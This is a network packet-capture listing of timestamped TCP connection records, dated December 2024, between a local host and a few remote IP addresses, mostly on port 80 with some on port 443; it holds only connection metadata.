                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.168488979 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.168518066 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.168536901 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.169783115 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.169821024 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.169852972 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.170026064 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.170711994 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.170753956 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.171080112 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.171195984 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.171837091 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.172261953 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.172450066 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.172489882 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.172810078 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.172960043 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.173160076 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.173197985 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.174079895 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.174149036 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.174189091 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.174964905 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.175014019 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.175055981 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.175611019 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.175997019 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.176039934 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.176075935 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.176107883 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.177143097 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.177181005 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.177731037 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.177774906 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.178261042 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.178306103 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.178466082 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.178512096 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.179337978 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.179568052 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.179609060 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.180435896 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.180521965 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.180602074 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.180638075 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.181421995 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.181462049 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.182001114 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.182204008 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.182552099 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.182564974 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.182590008 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.182607889 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.183605909 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.183675051 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.319084883 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.319149971 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.319216967 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.319252968 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.319619894 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.319660902 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.319735050 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.319773912 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.320684910 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.320724964 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.321063042 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.321105957 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.321738005 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.321780920 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.322143078 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.322195053 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.322797060 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.322838068 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.323012114 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.323616982 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.323880911 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.323920965 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.324126959 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.324187040 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.325017929 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.325061083 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.325133085 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.325165987 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.326055050 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.326344967 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.326397896 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.327094078 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.327291012 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.327330112 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.328178883 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.328229904 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.328357935 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.328406096 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.329319954 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.329366922 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.329698086 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.329736948 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.330343008 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.330384970 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.331396103 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.331417084 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.331443071 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.331459999 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.331553936 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.331593037 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.332493067 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.332531929 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.332566023 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.332602024 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.333635092 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.333674908 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.333915949 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.333957911 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.334708929 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.334752083 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.335807085 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.335819006 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.335854053 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.335933924 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.335978031 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.336915970 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.337163925 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.337183952 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.337223053 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.337927103 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.337938070 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.337971926 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.337989092 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.339015961 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.339184046 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.339334011 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.339371920 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.340086937 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.340317011 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.340367079 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.341120005 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.341192007 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.341308117 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.341357946 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.342365026 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.342405081 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.342686892 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.342730045 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.343334913 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.343377113 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.343555927 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.343595028 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.344501972 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.344558001 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.344559908 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.344662905 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.345464945 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.345530033 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.346028090 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.346069098 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.346589088 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.346602917 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.346641064 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.346656084 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.347640038 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.347682953 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.347965002 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.348006010 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.348761082 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.348805904 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.349551916 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.349883080 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.349910975 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.349999905 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.350218058 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.350261927 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.350924969 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.351008892 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.351164103 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.351211071 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.352047920 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.352102995 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.352701902 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.352754116 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.353117943 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.353492022 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.353538036 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.354268074 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.354321957 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.354733944 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.354804039 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.355257988 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.355307102 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.355539083 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.355588913 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.356436968 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.356481075 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.356884956 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.356925964 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.357490063 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.357599974 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.357645035 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.358550072 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.358599901 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.358836889 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.358890057 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.359524012 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.359591961 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.359694004 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.359725952 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.360709906 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.360766888 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.361087084 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.361128092 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.361850023 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.361896992 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.362468958 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.362518072 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.362808943 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.363111019 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.363154888 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.363267899 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.364006996 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.364022970 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.364051104 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.364063978 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.365075111 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.365391970 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.365438938 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.366118908 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.366174936 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.366210938 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.366714001 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.367244005 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.367271900 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.367320061 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.368261099 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.368330956 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.368465900 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.368514061 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.369342089 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.369947910 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.370027065 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.370071888 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.370357990 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.370397091 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.370896101 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.370942116 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.371507883 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.371556997 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.371726990 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.371764898 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.372525930 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.372714996 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.372762918 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.373584986 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.373624086 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.373960972 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.374012947 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.374723911 CET8049969185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.374773026 CET4996980192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.627438068 CET49996443192.168.2.635.190.72.216
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.627507925 CET4434999635.190.72.216192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.630522013 CET49996443192.168.2.635.190.72.216
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.634943962 CET49996443192.168.2.635.190.72.216
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.634978056 CET4434999635.190.72.216192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.748204947 CET44349992104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.748280048 CET49992443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.749459982 CET49992443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.749480963 CET44349992104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.749725103 CET44349992104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.750912905 CET49992443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.750941992 CET49992443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:54.750993013 CET44349992104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:55.293287039 CET44349994104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:55.294841051 CET49994443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:55.331002951 CET49994443192.168.2.6104.21.48.1
